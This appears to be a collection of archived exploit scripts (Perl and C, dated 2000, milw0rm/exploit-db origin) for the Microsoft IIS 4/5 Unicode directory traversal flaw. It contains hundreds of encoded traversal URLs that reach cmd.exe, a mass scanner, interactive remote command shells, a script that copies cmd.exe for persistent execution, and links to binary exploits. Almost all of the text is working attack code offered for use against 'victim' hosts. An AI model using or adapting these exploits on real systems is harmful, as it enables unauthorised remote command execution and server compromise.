"/_mem_bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[358] = "/_mem_bin/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[359] = "/_mem_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[360] = "/_mem_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[361] = "/_mem_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[362] = "/_mem_bin/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[363] = "/_mem_bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[364] = "/_mem_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[365] = "/_mem_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[366] = "/_mem_bin/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[367] = "/_mem_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[368] = "/_mem_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+"; $U[369] = "/_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[379] = "/_mem_bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[371] = "/_mem_bin/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[372] = "/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $U[373] = "/_mem_bin/..%255c../winnt/system32/cmd.exe?/c+"; $U[374] = "/_mem_bin/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[375] = "/_mem_bin/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[376] = "/_mem_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $U[377] = "/_mem_bin/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+"; $U[378] = "/_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"; $U[379] = "/_mem_bin/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[380] = "/_mem_bin/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[381] = "/_mem_bin/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[382] = "/_mem_bin/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $U[383] = "/_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[384] = "/_mem_bin/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[385] = "/_mem_bin/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[386] = "/_mem_bin/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[387] = "/_mem_bin/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $U[388] = "/_mem_bin/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[389] = "/_mem_bin/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[390] = "/_mem_bin/..%c1%9c/winnt/system32/cmd.exe?/c+"; $U[391] = "/_mem_bin/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+"; $U[392] = "/_mem_bin/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[393] = "/_mem_bin/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[394] = "/_mem_bin/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[395] = "/_mem_bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[396] = "/_mem_bin/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[397] = "/_mem_bin/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[398] = "/_mem_bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[399] = "/_mem_bin/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[400] = "/_vti_bin/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[401] = "/_vti_bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[402] = "/_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[403] = "/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+"; $U[404] = "/_vti_bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[405] = "/_vti_bin/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[406] = "/_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[407] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[408] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[409] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[410] = "/_vti_bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[411] = "/_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[412] = "/_vti_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[413] = "/_vti_bin/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[414] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[415] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+"; $U[416] = "/_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[417] = "/_vti_bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[418] = "/_vti_bin/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[419] = "/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $U[420] = "/_vti_bin/..%255c../winnt/system32/cmd.exe?/c+"; $U[421] = "/_vti_bin/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[422] = "/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[423] = "/_vti_bin/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[424] = "/_vti_bin/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[425] = "/_vti_bin/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $U[426] = "/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[427] = "/_vti_bin/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[428] = "/_vti_bin/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[429] = "/iisadmpwd/cmd.exe?/c+"; $U[430] = "/iisadmpwd/cmd1.exe?/c+"; $U[431] = "/iisadmpwd/root.exe?/c+"; $U[432] = "/iisadmpwd/sensepost.exe?/c+"; &intro; &scan; &choose; &command; &exit; sub intro { &help; &host; &server; sleep 3; }; sub host { print "\nHost or IP : "; $host=<STDIN>; chomp $host; if ($host eq ""){$host="127.0.0.1"}; print "\nPort (enter to accept 80): "; $port=<STDIN>; chomp $port; if ($port =~/\D/ ){$port="80"}; if ($port eq "" ) {$port = "80"}; }; sub server { my $X; print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; print "\nGet IIS string ..."; $probe = "string"; my $output; my $webserver = "something"; &connect; for ($X=0; $X<=10; $X++){ $output = $results[$X]; if (defined $output){ if ($output =~/IIS/){ $webserver = "iis" }; }; }; if ($webserver ne "iis"){ print "\a\a\n\nWARNING : UNABLE TO GET IIS STRING."; print "\nThis Server may not be running Micro\$oft IIS WebServer"; print "\n\n\nContinue anyway? ... [Y/N]"; my $choice = <STDIN>; chomp $choice; if ($choice =~/N/i) {&exit}; }else{ print "\n\nOK"; }; }; sub scan { my $status = "not_vulnerable"; print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; print "\nScanning $host on port $port ..."; my $loop; my $output; my $flag; $command="dir"; for ($loop=1; $loop < @U; $loop++) { $flag = "0"; $url = $U[$loop]; $probe = "scan"; &connect; foreach $output (@results){ if ($output =~ /Directory/) { $flag = "1"; $status = "vulnerable"; }; }; if ($flag eq "0") { print "\nNo URL $loop..."; }else{ print "\a\a\a\n$host VULNERABLE TO URL $loop !!!"; }; }; if ($status eq "not_vulnerable"){ print "\n\n SORRY $host is NOT Vulnerable to this Exploit."; &exit; }; }; sub choose { print "\nSelect a URL (type 0 to input)"; my $choice=<STDIN>; chomp $choice; if ($choice > @U){ &choose }; if ($choice =~/\D/g ){ &choose }; if ($choice == 0){ &other }; $url = $U[$choice]; print "\nURL: HTTP://$host$url"; }; sub other { print "\nURL [minus command] eg: HTTP://$host\/scripts\/cmd.exe?\/+"; print "\nHTTP://$host"; my $other = <STDIN>; chomp $other; $U[0] = $other; }; sub command { while ($command !~/quit/i) { print "\nHELP QUIT URL SCAN Or Command eg dir C: "; print "\nCommand :"; $command = <STDIN>; chomp $command; if ($command =~/quit/i) { &exit }; if ($command =~/url/i) { &choose }; if ($command =~/scan/i) { &scan }; if ($command =~/help/i) { &help }; $command =~ s/\s/+/g; print "HTTP://$host$url$command"; $probe = "command"; if ($command !~/quit|url|scan|help/) {&connect}; }; &exit; }; sub connect { my $connection = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port", ) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n"; $connection -> autoflush(1); if ($probe =~/command|scan/){ print $connection "GET $url$command$shiz HTTP/1.1\r\nHost: $host\r\n\r\n"; }elsif ($probe =~/string/) { print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n"; }; while ( <$connection> ) { @results = <$connection>; }; close $connection; if ($probe eq "command"){ &output }; if ($probe eq "string"){ &output }; }; sub output{ print "\nOUTPUT FROM $host. \n\n"; my $display; if ($probe eq "string") { my $X; for ($X=0; $X<=10; $X++) { $display = $results[$X]; if (defined $display){print "$display";}; sleep 1; }; }else{ foreach $display (@results){ print "$display"; sleep 1; }; }; }; sub exit{ print "\n\n\n ANDREA SPABAM 2002."; print "\nspabam.da.ru spabam\@go.to"; print "\n\n\n"; exit; }; sub help { print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; print "\n IIS-PLUS shell v 3.7 by SPABAM. 2002. spabam\@yahoo.com"; print "\n https://www.securityfocus.com/bid/1806/exploit/ "; print "\n A IIS HTTP exploit for Micro\$oft WebServers using 450 URL."; print "\n note.. web directory is normally c:\\Inetpub\\wwwroot"; print "\n"; print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)"; print "\n port: 80 (normally) or other (like https) (RETURN for 80)"; print "\n Command: SCAN URL HELP QUIT"; print "\n\n\n";

/* iisex iis exploit (<- nost's idea) v2 * -------------------------------------- * Okay.. the first piece of code was not really finished. * So, i apologize to everybody.. * * by incubus <incubus@securax.org> * * grtz to: Bio, nos, zoa, reg and vor... (who else would stay up * at night to exploit this?) to securax (#securax@efnet) - also * to kim, glyc, s0ph, tessa, lamagra and steven. */ #include <netdb.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> int main(int argc, char **argv){ char buffy[666]; /* well, what else? I dunno how long your commands are.. */ char buf[500]; char rcvbuf[8192]; int i, sock, result; struct sockaddr_in name; struct hostent *hostinfo; if (argc < 2){ printf ("try %s www.server.com\n", argv[0]); printf ("will let you play with cmd.exe of an IIS4/5 server.\n"); printf ("by incubus <incubus@securax.org>\n\n"); exit(0); } printf ("\niisex - iis 4 and 5 exploit\n---------------------------\n"); printf ("act like a cmd.exe kiddie, type quit to quit.\n"); for (;;) { printf ("\n[enter cmd> "); gets(buf); if (strstr(buf, "quit")) exit(0); i=0; while (buf[i] != '\n'){ if(buf[i] == 32) buf[i] = 43; i++; } hostinfo=gethostbyname(argv[1]); if (!hostinfo){ herror("Oops"); exit(-1); } name.sin_family=AF_INET; name.sin_port=htons(80); name.sin_addr=*(struct in_addr *)hostinfo->h_addr; sock=socket(AF_INET, SOCK_STREAM, 0); result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in)); if (result != 0) { herror("Oops"); exit(-1); } if (sock < 0){ herror("Oops"); exit(-1); } strcpy(buffy,"GET /scripts/..\%c0%af../winnt/system32/cmd.exe?/c+"); strcat(buffy,buf); strcat(buffy, " HTTP/1.0\n\n"); send(sock, buffy, sizeof(buffy), 0); recv(sock, rcvbuf, sizeof(rcvbuf), 0); printf ("%s", rcvbuf); close(sock); } } // milw0rm.com [2000-11-18]

#!/usr/bin/perl # # IIS 4.0/5.0 Unicode Exploit # Checks for each script that has been posted on the BugTraq Lis # Shouts to bighawk(thats for help), datagram, Ghost Rider, The Duke, p4, kript0n and others # Since It Uses fork(), you gotta keep up with whats happening. Or Just Let it run and it will # log sites in the log_unicode.log. # So Simple # Use Socket use Socket; # incase no arguements or less arguements are given if(@ARGV == '0' || @ARGV < 2) { die "IIS 4.0/5.0 Unicode Exploit\n". "Programmed by SteeLe\n". "Usage: ./$0 <single host> <dir for exploit>\n"; } # Variables $blah = $ARGV[0]; $port = 80; $dir = $ARGV[1]; $timeout = 4; # see if file is there, if (-e "$blah") { open(T, "$blah") || die "can't open $blah\n"; @target = <T>; close(T); } else { @target[0] = $blah; } # what you think is blah # all scripts mentioned on bugtraq, we know rfp knows more. @scripts = ("..%c1%1c..", "..%c0%9v..", "..%c0%af..", "..%c0%qf..", "..%c1%8s..", "..%c1%9c..", "..%c1%pc.."); # blah, i know i'm not l33t # Open LOG Script open(LOG, ">>log_unicode.log") || die "couldn't open a file for writing\n"; # Socket Stuff foreach $script (@scripts) { $submit = "GET /scripts/$script/winnt/system32/cmd.exe?/c+dir+$dir HTTP/1.0 \n\r\n\r"; $ouch = "/scripts/$script/winnt/system32/cmd.exe?/c+dir+$dir"; foreach $site (@target) { unless(fork()) { chop($site) if $site =~ /\n$/; &connect($site); } # so i lied } } sub connect { # real socket stuff my ($ste) = @_; $iaddr = inet_aton($ste) || die "$ste might not be up, connecting to next site....\n"; $paddr = sockaddr_in($port, $iaddr); $proto = getprotobyname('tcp'); local $SIG{ALRM} = sub { print "TimeOut On $ste, going to next one....\n" && exit(0) }; alarm $timeout; socket(SCAN, PF_INET, SOCK_STREAM, $proto) || die("Error: couldn't make a socket to $ste"); connect(SCAN, $paddr) || die "Sorry couldn't connect to $ste, connecting to next site....\n"; send(SCAN, $submit, 0); $blackout = <SCAN>; ($http,$code,$blah) == split(/ /, $blackout); if ($code == "200") { print "$ste has $ouch on there, go exploit it\n"; print LOG "$ste has $ouch on there\n"; } else { print "$ste doesn't have it\n"; } close(SCAN); exit(0); } close(LOG); # since we're done exit; # milw0rm.com [2000-11-18]

#!/usr/bin/perl # # See http://www.securityfocus.com/vdb/bottom.html?section=exploit&vid=1806 # # Very simple PERL script to execute commands on IIS Unicode vulnerable servers # Use port number with SSLproxy for testing SSL sites # Usage: unicodexecute2 IP:port command # Only makes use of "Socket" library # # New in version2: # Copy the cmd.exe to something else, and then use it. # The script checks for this. # Thnx to security@nsfocus.com for discovering the cmd.exe copy part # # Roelof Temmingh 2000/10/26 # roelof@sensepost.com http://www.sensepost.com use Socket; # --------------init if ($#ARGV<1) {die "Usage: unicodexecute IP:port command\n";} ($host,$port)=split(/:/,@ARGV[0]); $target = inet_aton($host); # --------------test if cmd has been copied: $failed=1; $command="dir"; @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /sensepost.exe/) {$failed=0;} } $failed2=1; if ($failed==1) { print "Sensepost.exe not found - Copying CMD...\n"; $command="copy c:\\winnt\\system32\\cmd.exe sensepost.exe"; $command=~s/ /\%20/g; @results2=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n"); foreach $line2 (@results2){ if (($line2 =~ /copied/ )) {$failed2=0;} } if ($failed2==1) {die "Copy of CMD failed - inspect manually:\n@results2\n\n"}; } # ------------ we can assume that the cmd.exe is copied from here.. $command=@ARGV[1]; print "Sensepost.exe found - Executing [$command] on $host:$port\n"; $command=~s/ /\%20/g; my @results=sendraw("GET /scripts/..%c0%af../inetpub/scripts/sensepost.exe?/c+$command HTTP/1.0\r\n\r\n"); print @results; # ------------- Sendraw - thanx RFP rfp@wiretrip.net sub sendraw { # this saves the whole transaction anyway my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); } } # Spidermark: sensepostdata # milw0rm.com [2000-11-18]

/****************************************************************************\ ** ** ** Microsoft IIS 4.0/5.0 Extended UNICODE Directory Traversal Exploit ** ** proof of theory exploit cuz it's wednesday and i'm on the couch ** ** ** ** brought to you by the letter B, the number 7, optyx, and t12 ** ** optyx - <optyx@uberhax0r.net optyx@newhackcity.net> ** ** t12 - <t12@uberhax0r.net> ** ** ** ** greetz go out to aempirei, a gun toatin' gangstah' hustler' player ** ** motherfucker who isn't with us anymore, miah, who's GTA2 game was ** ** was most entertaining tonight, Cathy, who provided the trippy light ** ** to stare at, and to KT, for providing me with hours of decent ** ** conversation. ** ** ** \****************************************************************************/ #include <stdio.h> #include <netdb.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> #include <signal.h> #include <errno.h> #include <fcntl.h> void usage(void) { fprintf(stderr, "usage: ./iis-zank <-t target> <-c 'command' or -i>"); fprintf(stderr, " [-p port] [-t timeout]\n"); exit(-1); } int main(int argc, char **argv) { int i, j; int port=80; int timeout=3; int interactive=0; char temp[1]; char host[512]=""; char cmd[1024]=""; char request[8192]="GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+"; struct hostent *he; struct sockaddr_in s_addr; printf("iis-zank_bread_chafer_8000_super_alpha_hyper_pickle.c\n"); printf("by optyx and t12\n"); for(i=0;i<argc;i++) { if(argv[i][0] == '-') { for(j=1;j<strlen(argv[i]);j++) { switch(argv[i][j]) { case 't': strncpy(host, argv[i+1], sizeof(host)); break; case 'c': strncpy(cmd, argv[i+1], sizeof(cmd)); break; case 'h': usage(); break; case 'o': timeout=atoi(argv[i+1]); break; case 'p': port=atoi(argv[i+1]); break; case 'i': interactive=1; break; default: break; } } } } if(!strcmp(host, "")) { fprintf(stderr, "specify target host\n"); usage(); } if(!strcmp(cmd, "") && !interactive) { fprintf(stderr, "specify command to execute\n"); usage(); } printf("]- Target - %s:%d\n", host, port); if(!interactive) printf("]- Command - %s\n", cmd); printf("]- Timeout - %d seconds\n", timeout); if((he=gethostbyname(host)) == NULL) { fprintf(stderr, "invalid target\n"); usage(); } do { if(interactive) { cmd[0]=0; printf("\nC> "); if(fgets(cmd, sizeof(cmd), stdin) == NULL) fprintf(stderr, "gets() error\n"); cmd[strlen(cmd)-1]='\0'; if(!strcmp("exit", cmd)) exit(-1); } for(i=0;i<strlen(cmd);i++) { if(cmd[i]==' ') cmd[i]='+'; } strncpy(request, "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+", sizeof(request)); strncat(request, cmd, sizeof(request) - strlen(request)); strncat(request, "\n", sizeof(request) - strlen(request)); s_addr.sin_family = PF_INET; s_addr.sin_port = htons(port); memcpy((char *) &s_addr.sin_addr, (char *) he->h_addr, sizeof(s_addr.sin_addr)); if((i=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { fprintf(stderr, "cannot create socket\n"); exit(-1); } alarm(timeout); j = connect(i, (struct sockaddr *) &s_addr, sizeof(s_addr)); alarm(0); if(j==-1) { fprintf(stderr, "cannot connect to %s\n", host); exit(-1); close(i); } if(!interactive) printf("]- Sending request: %s\n", request); send(i, request, strlen(request), 0); if(!interactive) printf("]- Getting results\n"); while(recv(i,temp,1, 0)>0) { alarm(timeout); printf("%c", temp[0]); alarm(0); } } while(interactive); close(i); return 0; } https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/190-1.exe https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/190-2.obsd https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/190-3.linux // milw0rm.com [2000-11-18]